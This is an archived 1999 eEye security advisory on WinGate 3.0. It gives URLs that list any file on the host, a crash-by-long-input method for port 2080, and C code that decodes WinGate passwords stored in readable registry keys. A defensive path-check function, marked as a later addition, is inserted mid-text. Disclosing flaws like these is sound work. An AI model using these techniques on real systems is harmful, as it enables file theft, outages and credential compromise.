eeye.99-02-22.wingate

Posted Sep 23, 1999

SHA-256 | 75296fecb26152a52ce6f1a407ca4f483e0f650876e01f1ed6aab6c41f3e99a5

eEye - Digital Security Team Alert

Multiple WinGate Vulnerabilities
Systems Affected
WinGate 3.0
Release Date
February 22, 1999
Advisory Code
AD02221999
Description:
WinGate 3.0 has three vulnerabilities.
1. Read any file on the remote system.
2. DoS the WinGate service.
3. Decrypt WinGate passwords.
Read any file on the remote system
We were debating whether we should add this to the advisory or not. We
figured it would not hurt, so here it is. The WinGate Log File service has in the past had holes
where you can read any file on the system. The holes still seem to be there, and some new ways of
doing it have cropped up.
http://www.server.com:8010/c:/ - NT/Win9x
http://www.server.com:8010// - NT/Win9x
http://www.server.com:8010/..../ - Win9x
Each of the above URLs will list all files on the remote machine.
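A defensive counterpart to the three URL forms above, added here as an example and not taken from the advisory or from WinGate: a request-path check for a log-viewing service that refuses drive-letter, empty and dot-only path segments. The function name log_path_allowed and the sample paths are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper, not WinGate code: returns 1 if a URL path may be
 * mapped to a file below the log directory, 0 if it must be refused. */
int log_path_allowed(const char *path)
{
    const char *seg;

    if (path == NULL || path[0] != '/')
        return 0;                          /* absolute URL paths only */
    seg = path + 1;
    for (;;) {
        size_t len = strcspn(seg, "/\\");  /* '\' also separates on Windows */
        size_t i, dots = 0;

        if (len == 0 && seg[0] != '\0')
            return 0;                      /* empty segment: the "//" form */
        for (i = 0; i < len; i++) {
            unsigned char c = (unsigned char)seg[i];
            if (c == ':')
                return 0;                  /* drive letter: the "/c:/" form */
            if (c == '%' || c < 0x20)
                return 0;                  /* undecoded escapes, control bytes */
            if (c == '.')
                dots++;
        }
        if (len > 0 && dots == len)
            return 0;                      /* ".", "..", "....": dot-only */
        if (seg[len] == '\0')
            return 1;                      /* every segment passed */
        seg += len + 1;
    }
}

int main(void)
{
    /* Constructed sample paths: the advisory's three forms plus two benign ones. */
    const char *samples[] = { "/c:/", "//", "/..../", "/", "/wingate.log" };
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-14s %s\n", samples[i],
               log_path_allowed(samples[i]) ? "allow" : "refuse");
    return 0;
}
```

A check like this belongs before the path is joined to the log directory; resolving the joined path and confirming it still lies under that directory remains the final gate.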
There are a few reasons why we were not sure if we were going to post this information.
By default all WinGate services are set so that only 127.0.0.1
can use the service. However, the purpose is to let users remotely view the logs, so chances
are people using the log file service are not going to be leaving it on 127.0.0.1. Also, by default
"Browse" is enabled in the WinGate settings. We are not sure if the developers intended the Browse
option to mean the whole hard drive. We would hope not.
The main reason we did put this in the advisory is the fact that
the average person using WinGate (cable modem users, etc.) is not the brightest of people and
will open the Log Service so that everyone has access to it. We understand there are papers out
there saying not to do this, and even the program itself says not to, but the average person will
not let this register in their head as a bad thing, so the software should at least make it as secure
as possible. Letting people read any file is not living up to that standard. Anyway, let's move on...
DoS the WinGate Service
The Winsock Redirector Service sits on port 2080. When you connect to it, send 2000 characters,
and disconnect, it will crash all WinGate services. Oh, yippee.
Decrypt the WinGate passwords
The registry keys where WinGate stores its passwords are insecure and let everyone read them.
Therefore anyone can get the passwords and decrypt them. Code follows.
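// ChrisA@eEye.com
// Mike@eEye.com
#include <stdio.h>
#include <string.h>

// XOR each byte of the stored value with a key derived only from its
// position: ((i + 1) << 1), truncated to one byte.
int main(int argc, char *argv[]) {
    size_t i, len;
    if (argc < 2) {
        fprintf(stderr, "usage: %s <stored-value>\n", argv[0]);
        return 1;
    }
    len = strlen(argv[1]);
    for (i = 0; i < len; i++)
        putchar(argv[1][i] ^ (char)((i + 1) << 1));
    return 0;
}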
You get the idea...
It is good that WinGate 3.0 by default locks down all services to
127.0.0.1. However, there still seem to be holes where, if one gets
access to the WinGate service from a non-blocked IP, they can do some damage. Chances are if you poke hard
at some of the other services you will find similar problems to the above.
Vendor Status
Contacted a month or so ago, have heard nothing. Someone from the NTSEC list contacted
eval-support@wingate.net with our findings and they were sent an email back rather quickly. We had
sent our emails to support@wingate.net. Maybe all three of our emails just got lost.
Copyright (c) 1999 eEye Digital Security Team

Permission is hereby granted for the redistribution of this alert electronically. It is not to be
edited in any way without express consent of eEye. If you wish to reprint the whole or any part of
this alert in any other medium excluding electronic medium, please e-mail alert@eEye.com for
permission.

Disclaimer:

The information within this paper may change without notice. Use of this information constitutes
acceptance for use in an AS IS condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any damages whatsoever arising out of or in connection
with the use or spread of this information. Any use of this information is at the user's own risk.

Please send suggestions, updates, and comments to:

eEye Digital Security Team

info@eEye.com
http://www.eEye.com

Copyright © 1998-1999 eEye.com - All Rights Reserved. eEye is an www.eCompany.com Venture.